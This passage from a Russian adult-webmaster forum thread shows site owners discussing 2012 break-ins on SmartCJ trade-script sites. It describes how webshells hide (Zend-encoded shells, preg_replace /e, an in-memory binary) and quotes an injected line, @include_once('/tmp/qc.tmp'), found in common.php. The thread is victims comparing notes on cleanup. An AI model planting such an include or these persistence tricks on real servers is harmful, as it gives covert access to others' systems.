С нами с 14.08.04
Сообщения: 1688
Рейтинг: 505
|
Добавлено: 21/10/12 в 11:24 |
kort писал: | fish_ka: все ломается, не только смарт. |
дело не в том что ломается. а что нет. в админке была возможность через какую либо уязвимость залить файл - если на сервере кроме сайтов с трейдовым скриптом ничего не было - то и возможности спрятатся в системе не так много
если там есть вордпресс или еще какой всенародно любимый скрипт - то мест куда спрятатся предостаточно самыми различными способами - начиная от зендом сжатых шелов - кончая хитрыми параметрами /e в такой безобидной фунцкии как preg_replace, самый необычный способ скомпилить софтинку назвать ее http и запустить - и пока она будет в памяти уже ничего не изменится
основная задача злоумышлеников в данной ситуации повышения прав до юзера который может редактировать файлы - сверх задача получение суперпользователя
но в реалии это нужно смотреть каждую машину детально и самому - а в данном случае - был написан бот и он первоначально погрузил автоматом шелы на все доступные машины - чем спалил всю ситуацию
"жадность фраера сгубила"
просто игогда машину тяжело почистить даже тем кто хорошо понимает и разбирается в администрировании и работе всей кухни вебмастерских скриптов - а тем кто не знает как запустьить в шеле файл или почему он не запускается - будет достаточно трудно - при любом раскладе на это нужно потратить время
с точки зрения обратной стороны это просто вебшелы на адалт ресурсах - те кто нашел дыру не захотел заниматся ей - и продал пионерам каким то - а может и 5ть раз, а может и 10ть раз
по этому такой был адский всплеск хакерской активности
зы насчет все ломается - поломайте статичные файлы которые нгинксом отдаются пожалуста
|
|
|
|
С нами с 20.10.02
Сообщения: 1131
Рейтинг: 486
|
Добавлено: 21/10/12 в 11:42 |
у меня стоит 48up тоже сломали
|
|
|
|
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
Добавлено: 21/10/12 в 12:04 |
fish_ka писал: | дело не в том что ломается. а что нет. в админке была возможность через какую либо уязвимость залить файл - если на сервере кроме сайтов с трейдовым скриптом ничего не было - то и возможности спрятатся в системе не так много |
Судя по тому, что пишут, взлом не через админку. Она закрыта basic авторизацией, без пароля не войдёшь. То есть, где-то в другом месте дыра.
|
|
|
|
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
Добавлено: 21/10/12 в 12:04 |
unix писал: | у меня стоит 48up тоже сломали |
И 49й ломают.
|
|
|
|
С нами с 11.01.07
Сообщения: 3607
Рейтинг: 2686
|
Добавлено: 21/10/12 в 13:17 |
fish_ka: не пугай людей.
назвать http и тп - после перезагрузки ее уже не будет.
спрятаться в других каталоагх - да, реально.
gimcnuk: через админку, я уже писал про это. проблема в том, что пароль дефолтный везде один и тот же. Про "я точно менял пароль и кроме меня его никто не знал" я ничего писать не буду. У меня каждый(!) день в асе люди у которых проблема решается примерно так
- у меня это не работает
- а вот это проверял?
- да, я сморел, я все делал
- ТОЧНО ?
.... через 5 минут
- ой да забыл\пропустил и тп
в любом случае мои логи с демо у меня есть, по ним так. если есть другие варианты - велкам.
|
|
|
|
С нами с 22.03.09
Сообщения: 1691
Рейтинг: 2478
|
Добавлено: 21/10/12 в 22:25 |
отпишитесь нашел ли кто чекалкой что-то новое
|
|
hostiserver.com - Хостинг под КВС и Смарт, чтобы работало быстро
|
1
|
|
|
С нами с 28.02.12
Сообщения: 651
Рейтинг: 571
|
Добавлено: 21/10/12 в 23:17 |
nosferatu писал: | отпишитесь нашел ли кто чекалкой что-то новое |
у меня чисто, говно поудалял ранее. И у меня кстате не было сж с дефолтными логин/пасс.
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 22/10/12 в 01:20 |
//
Последний раз редактировалось: X-dream (26/10/12 в 19:44), всего редактировалось 1 раз
|
|
|
|
С нами с 14.08.04
Сообщения: 1688
Рейтинг: 505
|
Добавлено: 22/10/12 в 12:55 |
nosferatu писал: | отпишитесь нашел ли кто чекалкой что-то новое |
логи апача нужно парсить - на предмет POST быстрее найти будет - если конечно есть что то не обычное
правда у продвинутых шелов - и продвинутых хакеров - код в куке передается
но таких единицы
|
|
|
|
С нами с 05.05.05
Сообщения: 9405
Рейтинг: 1844
|
Добавлено: 22/10/12 в 15:05 |
nosferatu писал: | отпишитесь нашел ли кто чекалкой что-то новое |
на одном сайте из всей кучи нашел только test.php , по содержанию точно такойже как и tmp.php.tt . Я конечно не шарю , но похоже на кукстафинг какойто.
LemonS писал: | что пароль дефолтный везде один и тот же. Про "я точно менял пароль и кроме меня его никто не знал" я ничего писать не буду. |
а вот и зря. более полугода вобще не ставил смарт, на сайте где нашел файл пароль сменен уже года два как (это если предположить, что засунули его в тот момент когда скрипт ставил). Ну и некоторые вещи я просто довожу до автоматизма, чтоб не забывать. В частности - после инстала сразу иду меняю пасворд, так что вероятность залезть именно под дефолтным паролем очень мала - 2-3 минуты во время инстала.
|
|
|
|
С нами с 11.01.07
Сообщения: 3607
Рейтинг: 2686
|
Добавлено: 22/10/12 в 15:12 |
fish_ka: я как раз так и нашел проблему на демо.
|
|
|
|
С нами с 28.02.12
Сообщения: 651
Рейтинг: 571
|
Добавлено: 22/10/12 в 15:38 |
Jabar писал: |
а вот и зря. более полугода вобще не ставил смарт, на сайте где нашел файл пароль сменен уже года два как (это если предположить, что засунули его в тот момент когда скрипт ставил). Ну и некоторые вещи я просто довожу до автоматизма, чтоб не забывать. В частности - после инстала сразу иду меняю пасворд, так что вероятность залезть именно под дефолтным паролем очень мала - 2-3 минуты во время инстала. |
Аналогично, пароли меняю сразу после инстала. Хз как оно смогло пробраться ко мне.
|
|
|
|
С нами с 11.01.07
Сообщения: 3607
Рейтинг: 2686
|
Добавлено: 22/10/12 в 17:47 |
Jabar: ну может предположить вариант xss
например ты залогинен в админке
я тебе даю линку на старницу где есть JS который открывает страницу с админкой напрмиер с нужными параметрами.
вообще я предположить могу много чего
но конкретую инфу я пишу на основе логов с демо
если у тебя есть другие логи и там виден какой-то другой вариант - велкам
|
|
|
|
С нами с 11.01.07
Сообщения: 3607
Рейтинг: 2686
|
Добавлено: 24/10/12 в 23:30 |
Как за 5 минут сделать блог
и наверно получить немного трафа на этом
Если вы хорошо наполняли базу изначально и у вас хорошие описания и очень желательно кастом галеры, то можно за 5 минут создать паралельно блог на той же базе.
* создаем субдомен условно blog.yourdomain.com
* ставим на этом субдомен smartcj
* делаем его слейвом yourdomain.com
* скачиваем темплейты блога. Обратите внимание что это темплейты сверстаны на версии 49.
* заливаем этот файл в Rotation - CMS (внизу Upload Templates )
Все, блог готов
|
|
|
|
С нами с 04.03.07
Сообщения: 8931
Рейтинг: 5138
|
Добавлено: 24/10/12 в 23:33 |
a пример того что получается можно увидеть?
|
|
|
|
Web Дизайн Сервис
С нами с 08.06.04
Сообщения: 21715
Рейтинг: 2248
|
Добавлено: 25/10/12 в 00:22 |
LemonS писал: | Как за 5 минут сделать блог
и наверно получить немного трафа на этом
Если вы хорошо наполняли базу изначально и у вас хорошие описания и очень желательно кастом галеры, то можно за 5 минут создать паралельно блог на той же базе.
* создаем субдомен условно blog.yourdomain.com
* ставим на этом субдомен smartcj
* делаем его слейвом yourdomain.com
* скачиваем темплейты блога. Обратите внимание что это темплейты сверстаны на версии 49.
* заливаем этот файл в Rotation - CMS (внизу Upload Templates )
Все, блог готов |
|
|
|
|
С нами с 11.01.07
Сообщения: 3607
Рейтинг: 2686
|
Добавлено: 25/10/12 в 02:41 |
sawm: чужой сайт как-то показывать стыдно, утром набью демо десками Может быть есть хороший готовый дамп где длинные дески ?
|
|
|
|
С нами с 17.12.00
Сообщения: 1653
Рейтинг: 1082
|
Добавлено: 25/10/12 в 09:34 |
даю дамп десков
Demo description 1
Demo description 2
..
Demo description N
|
|
|
|
С нами с 11.01.07
Сообщения: 3607
Рейтинг: 2686
|
Добавлено: 25/10/12 в 15:09 |
Nikso: не подумал про такой хороший вариант )
|
|
|
|
С нами с 15.03.04
Сообщения: 608
Рейтинг: 523
|
Добавлено: 25/10/12 в 18:42 |
Господа, подскажите по внесению новых галерок в мультинишевый тюб.
Есть определенное количество категорий. Спон дает данные по категориям мовика,к примеру,
Big tits
Blonde
Dildo
Masturbation
Sports
Teen
Как настроить, чтобы галерка была автоматом включена во все из этих категорий?
|
|
|
|
С нами с 11.01.07
Сообщения: 3607
Рейтинг: 2686
|
Добавлено: 25/10/12 в 19:53 |
blogdemo.smartcj.com демо блога, над дизайном конечно стоит поработать но смысл думаю ясен. "Посты" отсортированы по дате, Popular Posts по цтр.
Последний раз редактировалось: LemonS (25/10/12 в 20:11), всего редактировалось 1 раз
|
|
|
|
С нами с 11.01.07
Сообщения: 3607
Рейтинг: 2686
|
Добавлено: 25/10/12 в 20:11 |
|
|
|
|
С нами с 15.01.05
Сообщения: 273
Рейтинг: 224
|
Добавлено: 25/10/12 в 22:39 |
Пожелания на 50-й ап.
Хотелось бы чтоб в списке спонсоров не выводились неактивные спонсоры.
Хотелось бы капчу в камментах текстовую добавить как на форме регистрации трейдеров.
На слейвах пропала синонимизация десков после смены пароля на мускульной базе мастера.
|
|
|
|
С нами с 27.07.12
Сообщения: 45
Рейтинг: -37
|
Добавлено: 26/10/12 в 19:48 |
А где тут тема про создание шаблона на смарт?
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 26/10/12 в 20:48 |
по поводу взлома:
на одном сайте обнаружил в scj/cgi/common.php вот такой инклюд @include_once('/tmp/qc.tmp');
Код: [развернуть] |
<?php
$path_to_data = "/usr/www/site/site.com/htdocs/scj/data/";
$local_domain = 'vividbdsm.com';
if (!defined('BASE_DIR')) define('BASE_DIR', '/usr/www/site/site.com/htdocs/scj/');
if (!defined('CACHE_TIME')) define('CACHE_TIME', 1200);
?>
@include_once('/tmp/qc.tmp');
|
что это такое, и нужно ли оно?
сделал апдейт. скопировал index, out, common, include с папки cgi в корень.
|
|
|
|